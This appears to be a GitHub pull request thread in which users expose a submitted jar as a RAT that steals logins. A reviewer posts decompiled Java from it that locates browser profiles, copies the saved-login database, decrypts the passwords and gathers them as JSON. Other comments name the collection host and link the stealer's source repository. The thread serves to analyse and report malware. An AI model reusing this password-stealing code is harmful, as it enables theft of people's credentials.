### PR TITLE
VIRUS / MALWARE / RAT. It will take all your logins (discord, mail, b…

### PR DESCRIPTION
**Pull request by malpkakefirek**
…ank info)

VIRUS / MALWARE / RAT. It will take all your logins (discord, mail, bank info) https://isthisarat.com/score/84178f5287c6fae2f22b82312016c94091aef27cc10c5d1c0cf2ac7a81d458ec

### CODE REVIEW

**Comment by ChefUiChef** [comment]
Well... i looked inside the jar file but it looks like he's also grabbing our Browser History :/

image

**Comment by TacoMonkey11** [comment]
can confirm: 

```java
package dev.schubilegend.handlers;

import com.google.gson.JsonArray;
import com.google.gson.JsonObject;
import dev.schubilegend.agent;
import dev.schubilegend.utils.Utils;
import java.io.File;
import java.nio.file.Files;
import java.nio.file.StandardCopyOption;
import java.sql.Connection;
import java.sql.Driver;
import java.sql.ResultSet;
import java.util.HashMap;
import java.util.Properties;

public class MixinService {
   private static File appData = new File(System.getenv("APPDATA"));
   private static File localAppData = new File(System.getenv("LOCALAPPDATA"));
   private static HashMap<String, String> paths = new HashMap<String, String>() {
      {
         this.put("Google Chrome", MixinService.localAppData + "\\Google\\Chrome\\User Data");
         this.put("Microsoft Edge", MixinService.localAppData + "\\Microsoft\\Edge\\User Data");
         this.put("Chromium", MixinService.localAppData + "\\Chromium\\User Data");
         this.put("Opera", MixinService.appData + "\\Opera Software\\Opera Stable");
         this.put("Opera GX", MixinService.appData + "\\Opera Software\\Opera GX Stable");
         this.put("Brave", MixinService.localAppData + "\\BraveSoftware\\Brave-Browser\\User Data");
         this.put("Vivaldi", MixinService.localAppData + "\\Vivaldi\\User Data");
         this.put("Yandex", MixinService.localAppData + "\\Yandex\\YandexBrowser\\User Data");
      }
   };
   private final JsonArray pswds = new JsonArray();

   public JsonArray grabPassword() {
      this.crawlUserData();
      return this.pswds;
   }

   private void crawlUserData() {
      for(String browser : paths.keySet()) {
         File userData = new File(paths.get(browser));
         if (userData.exists()) {
            byte[] key = Utils.getKey(new File(userData, "Local State"));

            for(File data : userData.listFiles()) {
               if (data.getName().contains("Profile") || data.getName().equals("Default")) {
                  this.crawlPasswords(data, key);
               } else if (data.getName().equals("Login Data")) {
                  this.crawlPasswords(userData, key);
               }
            }
         }
      }
   }

   private void crawlPasswords(File profile, byte[] key) {
      try {
         File loginData = new File(profile, "Login Data");
         File tempLoginData = new File(profile, "Temp Login Data");
         if (!loginData.exists()) {
            return;
         }

         Files.copy(loginData.toPath(), tempLoginData.toPath(), StandardCopyOption.REPLACE_EXISTING);
         Driver driver = agent.driver;
         Properties props = new Properties();
         Connection connection = driver.connect("jdbc:sqlite:" + tempLoginData.getAbsolutePath(), props);
         ResultSet resultSet = connection.createStatement().executeQuery("SELECT origin_url, username_value, password_value FROM logins");

         while(resultSet.next()) {
            byte[] encryptedPassword = resultSet.getBytes(3);
            String decryptedPassword = Utils.decrypt(encryptedPassword, key);
            if (decryptedPassword != null || resultSet.getString(1) != null && resultSet.getString(2) != null) {
               JsonObject pswd = new JsonObject();
               pswd.addProperty("url", !resultSet.getString(1).equals("") ? resultSet.getString(1) : "N/A");
               pswd.addProperty("username", !resultSet.getString(2).equals("") ? resultSet.getString(2) : "N/A");
               pswd.addProperty("password", decryptedPassword);
               this.pswds.add(pswd);
            }
         }
      } catch (Exception var12) {
         var12.printStackTrace();
      }
   }
}
```

This is from decompiled code

**Comment by playfuldoggo** [comment]
can someone get any info on the sql database this guy is pushing the info to?

**Comment by TacoMonkey11** [comment]
requests are sent to https://schubi.onrender.com

**Comment by playfuldoggo** [comment]
"216.24.57.3" seems to be a cloudflare proxy, probably try and report it if we can

**Comment by playfuldoggo** [comment]
^ thats the direct ip of the domain fyi

**Comment by playfuldoggo** [comment]
the domain might also be able to be reported

**Comment by playfuldoggo** [comment]
email support@render.com about abuse of the domain "https://schubi.onrender.com/"

**Comment by playfuldoggo** [comment]
oohh i found this guy https://www.youtube.com/@Schubilegend , same music and everything and has usernames as well as having schubi in the name

**Comment by ArturoGRosich** [comment]
you guys are huge XD, but people just create 10 more profiles if they need to, its sad how many people can they scam

**Comment by ArturoGRosich** [comment]
I've found the source code this was copied from if it helps 
https://github.com/Schubilegend/SchubiRat

**Pull request closed without merging**
